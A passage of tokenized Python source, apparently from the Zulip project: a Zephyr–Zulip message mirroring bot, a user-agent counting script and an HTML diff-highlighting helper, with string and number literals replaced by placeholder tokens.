<EOL> except Exception : <EOL> decoded = zeph [ field ] . decode ( "<STR_LIT>" ) <EOL> zeph [ field ] = decoded <EOL> return zeph <EOL> def quit_failed_initialization ( message ) : <EOL> logger . error ( message ) <EOL> maybe_kill_child ( ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> def zephyr_init_autoretry ( ) : <EOL> backoff = zulip . RandomExponentialBackoff ( ) <EOL> while backoff . keep_going ( ) : <EOL> try : <EOL> zephyr . init ( ) <EOL> backoff . succeed ( ) <EOL> return <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> backoff . fail ( ) <EOL> quit_failed_initialization ( "<STR_LIT>" ) <EOL> def zephyr_load_session_autoretry ( session_path ) : <EOL> backoff = zulip . RandomExponentialBackoff ( ) <EOL> while backoff . keep_going ( ) : <EOL> try : <EOL> session = open ( session_path , "<STR_LIT:r>" ) . read ( ) <EOL> zephyr . _z . initialize ( ) <EOL> zephyr . _z . load_session ( session ) <EOL> zephyr . __inited = True <EOL> return <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> backoff . fail ( ) <EOL> quit_failed_initialization ( "<STR_LIT>" ) <EOL> def zephyr_subscribe_autoretry ( sub ) : <EOL> backoff = zulip . RandomExponentialBackoff ( ) <EOL> while backoff . keep_going ( ) : <EOL> try : <EOL> zephyr . Subscriptions ( ) . add ( sub ) <EOL> backoff . succeed ( ) <EOL> return <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> backoff . fail ( ) <EOL> quit_failed_initialization ( "<STR_LIT>" ) <EOL> def zephyr_to_zulip ( options ) : <EOL> if options . use_sessions and os . path . exists ( options . session_path ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> zephyr_load_session_autoretry ( options . session_path ) <EOL> else : <EOL> zephyr_init_autoretry ( ) <EOL> if options . forward_class_messages : <EOL> update_subscriptions ( ) <EOL> if options . forward_personals : <EOL> zephyr_subscribe_autoretry ( ( "<STR_LIT:message>" , "<STR_LIT:*>" , "<STR_LIT>" ) ) <EOL> zephyr_subscribe_autoretry ( ( "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> if options . nagios_class : <EOL> zephyr_subscribe_autoretry ( ( options . nagios_class , "<STR_LIT:*>" , "<STR_LIT:*>" ) ) <EOL> if options . use_sessions : <EOL> open ( options . session_path , "<STR_LIT:w>" ) . write ( zephyr . _z . dump_session ( ) ) <EOL> if options . logs_to_resend is not None : <EOL> with open ( options . logs_to_resend , '<STR_LIT:r>' ) as log : <EOL> for ln in log : <EOL> try : <EOL> zeph = simplejson . loads ( ln ) <EOL> zeph = decode_unicode_byte_strings ( zeph ) <EOL> if "<STR_LIT:class>" in zeph : <EOL> zeph [ "<STR_LIT>" ] = zeph [ "<STR_LIT:class>" ] <EOL> if "<STR_LIT>" in zeph : <EOL> zeph [ "<STR_LIT>" ] = zeph [ "<STR_LIT>" ] <EOL> logger . info ( "<STR_LIT>" % <EOL> ( zeph . get ( '<STR_LIT>' , zeph . get ( '<STR_LIT>' ) ) , <EOL> zeph [ '<STR_LIT>' ] ) ) <EOL> send_zulip ( zeph ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:2> ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> if options . resend_log_path is not None : <EOL> with open ( options . resend_log_path , '<STR_LIT:a>' ) as log : <EOL> process_loop ( log ) <EOL> else : <EOL> process_loop ( None ) <EOL> def send_zephyr ( zwrite_args , content ) : <EOL> p = subprocess . Popen ( zwrite_args , stdin = subprocess . PIPE , <EOL> stdout = subprocess . PIPE , stderr = subprocess . PIPE ) <EOL> stdout , stderr = p . communicate ( input = content . encode ( "<STR_LIT:utf-8>" ) ) <EOL> if p . returncode : <EOL> logger . error ( "<STR_LIT>" % ( <EOL> "<STR_LIT:U+0020>" . join ( zwrite_args ) , p . returncode , ) ) <EOL> if stdout : <EOL> logger . info ( "<STR_LIT>" + stdout ) <EOL> elif stderr : <EOL> logger . warning ( "<STR_LIT>" % ( <EOL> "<STR_LIT:U+0020>" . join ( zwrite_args ) , ) ) <EOL> if stderr : <EOL> logger . warning ( "<STR_LIT>" + stderr ) <EOL> return ( p . returncode , stderr ) <EOL> def send_authed_zephyr ( zwrite_args , content ) : <EOL> return send_zephyr ( zwrite_args , content ) <EOL> def send_unauthed_zephyr ( zwrite_args , content ) : <EOL> return send_zephyr ( zwrite_args + [ "<STR_LIT>" ] , content ) <EOL> def zcrypt_encrypt_content ( zephyr_class , instance , content ) : <EOL> keypath = parse_crypt_table ( zephyr_class , instance ) <EOL> if keypath is None : <EOL> return None <EOL> p = subprocess . Popen ( [ "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , <EOL> keypath ] , <EOL> stdin = subprocess . PIPE , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> encrypted , _ = p . communicate ( input = content ) <EOL> return encrypted <EOL> def forward_to_zephyr ( message ) : <EOL> support_heading = "<STR_LIT>" <EOL> support_closing = """<STR_LIT>""" <EOL> wrapper = textwrap . TextWrapper ( break_long_words = False , break_on_hyphens = False ) <EOL> wrapped_content = "<STR_LIT:\n>" . join ( "<STR_LIT:\n>" . join ( wrapper . wrap ( line ) ) <EOL> for line in message [ "<STR_LIT:content>" ] . replace ( "<STR_LIT:@>" , "<STR_LIT>" ) . split ( "<STR_LIT:\n>" ) ) <EOL> zwrite_args = [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , message [ "<STR_LIT>" ] , <EOL> "<STR_LIT>" , "<STR_LIT>" , <EOL> "<STR_LIT>" , "<STR_LIT>" ] <EOL> if message [ '<STR_LIT:type>' ] == "<STR_LIT>" and zulip_account_email == "<STR_LIT>" : <EOL> zwrite_args . extend ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> if message [ '<STR_LIT:type>' ] == "<STR_LIT>" : <EOL> zephyr_class = message [ "<STR_LIT>" ] <EOL> instance = message [ "<STR_LIT>" ] <EOL> match_whitespace_instance = re . match ( r'<STR_LIT>' , instance ) <EOL> if match_whitespace_instance : <EOL> instance = match_whitespace_instance . group ( <NUM_LIT:1> ) <EOL> elif ( instance == "<STR_LIT>" % ( zephyr_class , ) or <EOL> instance == "<STR_LIT>" % ( zephyr_class , ) ) : <EOL> if instance . startswith ( "<STR_LIT:test>" ) : <EOL> instance = zephyr_class <EOL> zephyr_class = "<STR_LIT>" <EOL> else : <EOL> instance = zephyr_class <EOL> zephyr_class = "<STR_LIT:message>" <EOL> zwrite_args . extend ( [ "<STR_LIT:-c>" , zephyr_class , "<STR_LIT>" , instance ] ) <EOL> logger . info ( "<STR_LIT>" % ( zephyr_class , instance ) ) <EOL> elif message [ '<STR_LIT:type>' ] == "<STR_LIT>" : <EOL> if len ( message [ '<STR_LIT>' ] ) == <NUM_LIT:1> : <EOL> recipient = to_zephyr_username ( message [ "<STR_LIT>" ] [ <NUM_LIT:0> ] [ "<STR_LIT:email>" ] ) <EOL> recipients = [ recipient ] <EOL> elif len ( message [ '<STR_LIT>' ] ) == <NUM_LIT:2> : <EOL> recipient = "<STR_LIT>" <EOL> for r in message [ "<STR_LIT>" ] : <EOL> if r [ "<STR_LIT:email>" ] . lower ( ) != zulip_account_email . lower ( ) : <EOL> recipient = to_zephyr_username ( r [ "<STR_LIT:email>" ] ) <EOL> break <EOL> recipients = [ recipient ] <EOL> else : <EOL> zwrite_args . extend ( [ "<STR_LIT>" ] ) <EOL> recipients = [ to_zephyr_username ( user [ "<STR_LIT:email>" ] ) . replace ( "<STR_LIT>" , "<STR_LIT>" ) <EOL> for user in message [ "<STR_LIT>" ] ] <EOL> logger . info ( "<STR_LIT>" % ( recipients , ) ) <EOL> zwrite_args . extend ( recipients ) <EOL> if message . get ( "<STR_LIT>" ) : <EOL> result = zcrypt_encrypt_content ( zephyr_class , instance , wrapped_content ) <EOL> if result is None : <EOL> return send_error_zulip ( """<STR_LIT>""" % ( support_heading , support_closing ) ) <EOL> wrapped_content = result <EOL> zwrite_args . extend ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> if options . test_mode : <EOL> logger . debug ( "<STR_LIT>" % <EOL> ( zwrite_args , wrapped_content . encode ( "<STR_LIT:utf-8>" ) ) ) <EOL> return <EOL> ( code , stderr ) = send_authed_zephyr ( zwrite_args , wrapped_content ) <EOL> if code == <NUM_LIT:0> and stderr == "<STR_LIT>" : <EOL> return <EOL> elif code == <NUM_LIT:0> : <EOL> return send_error_zulip ( """<STR_LIT>""" % ( support_heading , stderr , support_closing ) ) <EOL> elif code != <NUM_LIT:0> and ( stderr . startswith ( "<STR_LIT>" ) or <EOL> stderr . startswith ( "<STR_LIT>" ) ) : <EOL> ( code , stderr ) = send_unauthed_zephyr ( zwrite_args , wrapped_content ) <EOL> if code == <NUM_LIT:0> : <EOL> if options . ignore_expired_tickets : <EOL> return <EOL> return send_error_zulip ( """<STR_LIT>""" % ( support_heading , support_closing ) ) <EOL> return send_error_zulip ( """<STR_LIT>""" % ( support_heading , stderr , support_closing ) ) <EOL> def maybe_forward_to_zephyr ( message ) : <EOL> if ( message [ "<STR_LIT>" ] == zulip_account_email ) : <EOL> if not ( ( message [ "<STR_LIT:type>" ] == "<STR_LIT>" ) or <EOL> ( message [ "<STR_LIT:type>" ] == "<STR_LIT>" and <EOL> False not in [ u [ "<STR_LIT:email>" ] . lower ( ) . endswith ( "<STR_LIT>" ) for u in <EOL> message [ "<STR_LIT>" ] ] ) ) : <EOL> return <EOL> timestamp_now = datetime . datetime . now ( ) . strftime ( "<STR_LIT:%s>" ) <EOL> if float ( message [ "<STR_LIT>" ] ) < float ( timestamp_now ) - <NUM_LIT:15> : <EOL> logger . warning ( "<STR_LIT>" % <EOL> ( message [ "<STR_LIT>" ] , timestamp_now ) ) <EOL> return <EOL> try : <EOL> forward_to_zephyr ( message ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> def zulip_to_zephyr ( options ) : <EOL> logger . info ( "<STR_LIT>" ) <EOL> while True : <EOL> try : <EOL> zulip_client . call_on_each_message ( maybe_forward_to_zephyr ) <EOL> except Exception : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> time . sleep ( <NUM_LIT:1> ) <EOL> def subscribed_to_mail_messages ( ) : <EOL> stored_result = os . environ . get ( "<STR_LIT>" ) <EOL> if stored_result is not None : <EOL> return stored_result == "<STR_LIT:True>" <EOL> for ( cls , instance , recipient ) in parse_zephyr_subs ( verbose = False ) : <EOL> if ( cls . lower ( ) == "<STR_LIT>" and instance . lower ( ) == "<STR_LIT>" ) : <EOL> os . environ [ "<STR_LIT>" ] = "<STR_LIT:True>" <EOL> return True <EOL> os . environ [ "<STR_LIT>" ] = "<STR_LIT:False>" <EOL> return False <EOL> def add_zulip_subscriptions ( verbose ) : <EOL> zephyr_subscriptions = set ( ) <EOL> skipped = set ( ) <EOL> for ( cls , instance , recipient ) in parse_zephyr_subs ( verbose = verbose ) : <EOL> if cls . lower ( ) == "<STR_LIT:message>" : <EOL> if recipient != "<STR_LIT:*>" : <EOL> continue <EOL> if instance == "<STR_LIT:*>" : <EOL> if recipient == "<STR_LIT:*>" : <EOL> skipped . add ( ( cls , instance , recipient , "<STR_LIT>" ) ) <EOL> continue <EOL> zephyr_subscriptions . add ( instance ) <EOL> continue <EOL> elif cls . lower ( ) == "<STR_LIT>" and instance . lower ( ) == "<STR_LIT>" : <EOL> continue <EOL> elif len ( cls ) > <NUM_LIT> : <EOL> skipped . add ( ( cls , instance , recipient , "<STR_LIT>" ) ) <EOL> continue <EOL> elif instance != "<STR_LIT:*>" : <EOL> skipped . add ( ( cls , instance , recipient , "<STR_LIT>" ) ) <EOL> continue <EOL> elif recipient != "<STR_LIT:*>" : <EOL> skipped . add ( ( cls , instance , recipient , "<STR_LIT>" ) ) <EOL> continue <EOL> zephyr_subscriptions . add ( cls ) <EOL> if len ( zephyr_subscriptions ) != <NUM_LIT:0> : <EOL> res = zulip_client . add_subscriptions ( list ( { "<STR_LIT:name>" : stream } for stream in zephyr_subscriptions ) , <EOL> authorization_errors_fatal = False ) <EOL> if res . get ( "<STR_LIT:result>" ) != "<STR_LIT:success>" : <EOL> logger . error ( "<STR_LIT>" % ( res [ "<STR_LIT>" ] , ) ) <EOL> return <EOL> already = res . get ( "<STR_LIT>" ) <EOL> new = res . get ( "<STR_LIT>" ) <EOL> unauthorized = res . get ( "<STR_LIT>" ) <EOL> if verbose : <EOL> if already is not None and len ( already ) > <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" % ( "<STR_LIT:U+002CU+0020>" . join ( list ( already . values ( ) ) [ <NUM_LIT:0> ] ) , ) ) <EOL> if new is not None and len ( new ) > <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT>" % ( "<STR_LIT:U+002CU+0020>" . join ( list ( new . values ( ) ) [ <NUM_LIT:0> ] ) , ) ) <EOL> if unauthorized is not None and len ( unauthorized ) > <NUM_LIT:0> : <EOL> logger . info ( "<STR_LIT:\n>" + "<STR_LIT:\n>" . join ( textwrap . wrap ( """<STR_LIT>""" ) ) + "<STR_LIT>" % ( "<STR_LIT:U+002CU+0020>" . join ( unauthorized ) , ) ) <EOL> if len ( skipped ) > <NUM_LIT:0> : <EOL> if verbose : <EOL> logger . info ( "<STR_LIT:\n>" + "<STR_LIT:\n>" . join ( textwrap . wrap ( """<STR_LIT>""" ) ) + "<STR_LIT:\n>" ) <EOL> for ( cls , instance , recipient , reason ) in skipped : <EOL> if verbose : <EOL> if reason != "<STR_LIT>" : <EOL> logger . info ( "<STR_LIT>" % ( cls , instance , recipient , reason ) ) <EOL> else : <EOL> logger . info ( "<STR_LIT>" % ( cls , instance , recipient ) ) <EOL> if len ( skipped ) > <NUM_LIT:0> : <EOL> if verbose : <EOL> logger . info ( "<STR_LIT:\n>" + "<STR_LIT:\n>" . join ( textwrap . wrap ( """<STR_LIT>""" ) ) + "<STR_LIT:\n>" ) <EOL> def valid_stream_name ( name ) : <EOL> return name != "<STR_LIT>" <EOL> def parse_zephyr_subs ( verbose = False ) : <EOL> zephyr_subscriptions = set ( ) <EOL> subs_file = os . path . join ( os . environ [ "<STR_LIT>" ] , "<STR_LIT>" ) <EOL> if not os . path . exists ( subs_file ) : <EOL> if verbose : <EOL> logger . error ( "<STR_LIT>" ) <EOL> return [ ] <EOL> for line in open ( subs_file , "<STR_LIT:r>" ) . readlines ( ) : <EOL> line = line . strip ( ) <EOL> if len ( line ) == <NUM_LIT:0> : <EOL> continue <EOL> try : <EOL> ( cls , instance , recipient ) = line . split ( "<STR_LIT:U+002C>" ) <EOL> cls = cls . replace ( "<STR_LIT>" , options . user ) <EOL> instance = instance . replace ( "<STR_LIT>" , options . user ) <EOL> recipient = recipient . replace ( "<STR_LIT>" , options . user ) <EOL> if not valid_stream_name ( cls ) : <EOL> if verbose : <EOL> logger . error ( "<STR_LIT>" % ( line , ) ) <EOL> continue <EOL> except Exception : <EOL> if verbose : <EOL> logger . error ( "<STR_LIT>" % ( line , ) ) <EOL> continue <EOL> zephyr_subscriptions . add ( ( cls . strip ( ) , instance . strip ( ) , recipient . strip ( ) ) ) <EOL> return zephyr_subscriptions <EOL> def open_logger ( ) : <EOL> if options . log_path is not None : <EOL> log_file = options . log_path <EOL> elif options . forward_class_messages : <EOL> if options . test_mode : <EOL> log_file = "<STR_LIT>" <EOL> else : <EOL> log_file = "<STR_LIT>" <EOL> else : <EOL> f = tempfile . NamedTemporaryFile ( prefix = "<STR_LIT>" % ( options . user , ) , <EOL> delete = False ) <EOL> log_file = f . name <EOL> f . close ( ) <EOL> logger = logging . getLogger ( __name__ ) <EOL> log_format = "<STR_LIT>" <EOL> formatter = logging . Formatter ( log_format ) <EOL> logging . basicConfig ( format = log_format ) <EOL> logger . setLevel ( logging . DEBUG ) <EOL> file_handler = logging . FileHandler ( log_file ) <EOL> file_handler . setFormatter ( formatter ) <EOL> logger . addHandler ( file_handler ) <EOL> return logger <EOL> def configure_logger ( logger , direction_name ) : <EOL> if direction_name is None : <EOL> log_format = "<STR_LIT>" <EOL> else : <EOL> log_format = "<STR_LIT>" + direction_name + "<STR_LIT>" <EOL> formatter = logging . Formatter ( log_format ) <EOL> for handler in logger . handlers : <EOL> handler . setFormatter ( formatter ) <EOL> root_logger = logging . getLogger ( ) <EOL> for handler in root_logger . handlers : <EOL> handler . setFormatter ( formatter ) <EOL> def parse_args ( ) : <EOL> parser = optparse . OptionParser ( ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> help = optparse . SUPPRESS_HELP , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> help = optparse . SUPPRESS_HELP , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> default = "<STR_LIT>" , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP , <EOL> default = True , <EOL> action = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> dest = '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP , <EOL> default = False , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = True , <EOL> dest = '<STR_LIT>' , <EOL> help = optparse . SUPPRESS_HELP , <EOL> action = '<STR_LIT>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> help = optparse . SUPPRESS_HELP , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = DEFAULT_SITE , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = None , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = os . environ [ "<STR_LIT>" ] , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = "<STR_LIT>" , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = None , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = None , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = None , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> action = '<STR_LIT:store_true>' , <EOL> help = optparse . SUPPRESS_HELP ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = False , <EOL> help = optparse . SUPPRESS_HELP , <EOL> action = '<STR_LIT:store_true>' ) <EOL> parser . add_option ( '<STR_LIT>' , <EOL> default = os . path . join ( os . environ [ "<STR_LIT>" ] , "<STR_LIT>" , "<STR_LIT>" ) ) <EOL> return parser . parse_args ( ) <EOL> def die_gracefully ( signal , frame ) : <EOL> if CURRENT_STATE == States . ZulipToZephyr or CURRENT_STATE == States . ChildSending : <EOL> os . _exit ( <NUM_LIT:1> ) <EOL> if CURRENT_STATE == States . ZephyrToZulip and not options . use_sessions : <EOL> try : <EOL> zephyr . _z . cancelSubs ( ) <EOL> except IOError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> if __name__ == "<STR_LIT:__main__>" : <EOL> signal . signal ( signal . SIGCHLD , signal . SIG_DFL ) <EOL> signal . signal ( signal . SIGINT , die_gracefully ) <EOL> ( options , args ) = parse_args ( ) <EOL> logger = open_logger ( ) <EOL> configure_logger ( logger , "<STR_LIT>" ) <EOL> pyzephyr_lib_path = "<STR_LIT>" % ( os . uname ( ) [ <NUM_LIT:4> ] , sys . version [ <NUM_LIT:0> : <NUM_LIT:3> ] ) <EOL> sys . path [ : <NUM_LIT:0> ] = [ os . path . join ( options . root_path , '<STR_LIT>' ) , <EOL> options . root_path , <EOL> os . path . join ( options . root_path , "<STR_LIT>" ) , <EOL> os . path . join ( options . root_path , pyzephyr_lib_path ) ] <EOL> if os . environ . get ( "<STR_LIT>" ) is not None : <EOL> api_key = os . environ . get ( "<STR_LIT>" ) <EOL> else : <EOL> if not os . path . exists ( options . api_key_file ) : <EOL> logger . error ( "<STR_LIT:\n>" + "<STR_LIT:\n>" . join ( textwrap . wrap ( """<STR_LIT>""" % ( options . api_key_file , ) ) ) ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> api_key = open ( options . api_key_file ) . read ( ) . strip ( ) <EOL> os . environ [ "<STR_LIT>" ] = api_key <EOL> if options . nagios_path is None and options . nagios_class is not None : <EOL> logger . error ( "<STR_LIT:\n>" + "<STR_LIT>" ) <EOL> sys . exit ( <NUM_LIT:1> ) <EOL> zulip_account_email = options . user + "<STR_LIT>" <EOL> import zulip <EOL> zulip_client = zulip . Client ( <EOL> email = zulip_account_email , <EOL> api_key = api_key , <EOL> verbose = True , <EOL> client = "<STR_LIT>" , <EOL> site = options . site ) <EOL> start_time = time . time ( ) <EOL> if options . sync_subscriptions : <EOL> configure_logger ( logger , None ) <EOL> logger . info ( "<STR_LIT>" ) <EOL> add_zulip_subscriptions ( True ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> if not options . test_mode : <EOL> pgrep_query = "<STR_LIT>" <EOL> if options . shard is not None : <EOL> pgrep_query = "<STR_LIT>" % ( pgrep_query , options . shard ) <EOL> elif options . user is not None : <EOL> pgrep_query = "<STR_LIT>" % ( pgrep_query , options . user ) <EOL> proc = subprocess . Popen ( [ '<STR_LIT>' , '<STR_LIT>' , os . environ [ "<STR_LIT>" ] , "<STR_LIT>" , pgrep_query ] , <EOL> stdout = subprocess . PIPE , <EOL> stderr = subprocess . PIPE ) <EOL> out , _err_unused = proc . communicate ( ) <EOL> for pid in map ( int , out . split ( ) ) : <EOL> if pid == os . getpid ( ) or pid == os . getppid ( ) : <EOL> continue <EOL> logger . info ( "<STR_LIT>" % ( pid , ) ) <EOL> try : <EOL> os . kill ( pid , signal . SIGINT ) <EOL> except OSError : <EOL> logger . exception ( "<STR_LIT>" ) <EOL> if options . shard is not None and set ( options . shard ) != set ( "<STR_LIT:a>" ) : <EOL> options . forward_personals = False <EOL> options . forward_from_zulip = False <EOL> if options . forward_mail_zephyrs is None : <EOL> options . forward_mail_zephyrs = subscribed_to_mail_messages ( ) <EOL> if options . session_path is None : <EOL> options . session_path = "<STR_LIT>" % ( options . user , ) <EOL> if options . forward_from_zulip : <EOL> child_pid = os . fork ( ) <EOL> if child_pid == <NUM_LIT:0> : <EOL> CURRENT_STATE = States . ZulipToZephyr <EOL> configure_logger ( logger , "<STR_LIT>" ) <EOL> zulip_to_zephyr ( options ) <EOL> sys . exit ( <NUM_LIT:0> ) <EOL> else : <EOL> child_pid = None <EOL> CURRENT_STATE = States . ZephyrToZulip <EOL> import zephyr <EOL> logger_name = "<STR_LIT>" <EOL> if options . shard is not None : <EOL> logger_name += "<STR_LIT>" % ( options . shard , ) <EOL> configure_logger ( logger , logger_name ) <EOL> signal . signal ( signal . SIGCHLD , signal . SIG_IGN ) <EOL> zephyr_to_zulip ( options ) </s>
<s> from __future__ import print_function <EOL> import re <EOL> from collections import defaultdict <EOL> import os <EOL> import sys <EOL> sys . path . insert ( <NUM_LIT:0> , os . path . join ( os . path . dirname ( __file__ ) , '<STR_LIT:..>' ) ) <EOL> from zerver . lib . user_agent import parse_user_agent <EOL> user_agents_parsed = defaultdict ( int ) <EOL> user_agents_path = os . path . join ( os . path . dirname ( __file__ ) , "<STR_LIT>" ) <EOL> parse_errors = <NUM_LIT:0> <EOL> for line in open ( user_agents_path ) . readlines ( ) : <EOL> line = line . strip ( ) <EOL> match = re . match ( '<STR_LIT>' , line ) <EOL> if match is None : <EOL> print ( line ) <EOL> continue <EOL> groupdict = match . groupdict ( ) <EOL> count = groupdict [ "<STR_LIT:count>" ] <EOL> user_agent = groupdict [ "<STR_LIT>" ] <EOL> ret = parse_user_agent ( user_agent ) <EOL> if ret is None : <EOL> print ( "<STR_LIT>" , line ) <EOL> parse_errors += <NUM_LIT:1> <EOL> continue <EOL> user_agents_parsed [ ret [ "<STR_LIT:name>" ] ] += int ( count ) <EOL> for key in user_agents_parsed : <EOL> print ( "<STR_LIT:U+0020>" , key , user_agents_parsed [ key ] ) <EOL> print ( "<STR_LIT>" % ( parse_errors , ) ) </s>
<s> from __future__ import absolute_import <EOL> from django . conf import settings <EOL> from diff_match_patch import diff_match_patch <EOL> import platform <EOL> import logging <EOL> def highlight_with_class ( klass , text ) : <EOL> return '<STR_LIT>' % ( klass , text ) <EOL> def highlight_inserted ( text ) : <EOL> return highlight_with_class ( '<STR_LIT>' , text ) <EOL> def highlight_deleted ( text ) : <EOL> return highlight_with_class ( '<STR_LIT>' , text ) <EOL> def highlight_replaced ( text ) : <EOL> return highlight_with_class ( '<STR_LIT>' , text ) <EOL> def chunkize ( text , in_tag ) : <EOL> start = <NUM_LIT:0> <EOL> idx = <NUM_LIT:0> <EOL> chunks = [ ] <EOL> for c in text : <EOL> if c == '<STR_LIT:<>' : <EOL> in_tag = True <EOL> if start != idx : <EOL> chunks . append ( ( '<STR_LIT:text>' , text [ start : idx ] ) ) <EOL> start = idx <EOL> elif c == '<STR_LIT:>>' : <EOL> in_tag = False <EOL> if start != idx + <NUM_LIT:1> : <EOL> chunks . append ( ( '<STR_LIT>' , text [ start : idx + <NUM_LIT:1> ] ) ) <EOL> start = idx + <NUM_LIT:1> <EOL> idx += <NUM_LIT:1> <EOL> if start != idx : <EOL> chunks . append ( ( '<STR_LIT>' if in_tag else '<STR_LIT:text>' , text [ start : idx ] ) ) <EOL> return chunks , in_tag <EOL> def highlight_chunks ( chunks , highlight_func ) : <EOL> retval = '<STR_LIT>' <EOL> for type , text in chunks : <EOL> if type == '<STR_LIT:text>' : <EOL> retval += highlight_func ( text ) <EOL> else : <EOL> retval += text <EOL> return retval <EOL> def verify_html ( html ) : <EOL> in_tag = False <EOL> for c in html : <EOL> if c == '<STR_LIT:<>' : <EOL> if in_tag : <EOL> return False <EOL> in_tag = True <EOL> elif c == '<STR_LIT:>>' : <EOL> if not in_tag : <EOL> return False <EOL> in_tag = False <EOL> if in_tag : <EOL> return False <EOL> return True <EOL> def highlight_html_differences ( s1 , s2 ) : <EOL> differ = diff_match_patch ( ) <EOL> ops = differ . diff_main ( s1 , s2 ) <EOL> differ . diff_cleanupSemantic ( ops ) <EOL> retval = '<STR_LIT>' <EOL> in_tag = False <EOL> idx = <NUM_LIT:0> <EOL> while idx < len ( ops ) : <EOL> op , text = ops [ idx ] <EOL> next_op = None <EOL> if idx != len ( ops ) - <NUM_LIT:1> : <EOL> next_op , next_text = ops [ idx + <NUM_LIT:1> ] <EOL> if op == diff_match_patch . DIFF_DELETE and next_op == diff_match_patch . DIFF_INSERT : <EOL> chunks , in_tag = chunkize ( next_text , in_tag ) <EOL> retval += highlight_chunks ( chunks , highlight_replaced ) <EOL> idx += <NUM_LIT:1> <EOL> elif op == diff_match_patch . DIFF_INSERT and next_op == diff_match_patch . DIFF_DELETE : <EOL> chunks , in_tag = chunkize ( text , in_tag ) <EOL> retval += highlight_chunks ( chunks , highlight_replaced ) <EOL> idx += <NUM_LIT:1> <EOL> elif op == diff_match_patch . DIFF_DELETE : <EOL> retval += highlight_deleted ( '<STR_LIT>' ) <EOL> elif op == diff_match_patch . DIFF_INSERT : <EOL> chunks , in_tag = chunkize ( text , in_tag ) <EOL> retval += highlight_chunks ( chunks , highlight_inserted ) <EOL> elif op == diff_match_patch . DIFF_EQUAL : <EOL> chunks , in_tag = chunkize ( text , in_tag ) <EOL> retval += text <EOL> idx += <NUM_LIT:1> <EOL> if not verify_html ( retval ) : <EOL> from zerver . lib . actions import internal_send_message <EOL> logging . getLogger ( '<STR_LIT>' ) . error ( '<STR_LIT>' ) <EOL> if settings . ERROR_BOT is not None : <EOL> subject = "<STR_LIT>" % ( platform . node ( ) , ) <EOL> internal_send_message ( settings . ERROR_BOT , "<STR_LIT>" , <EOL> "<STR_LIT>" , subject , "<STR_LIT>" ) <EOL> return s2 <EOL> return retval </s>
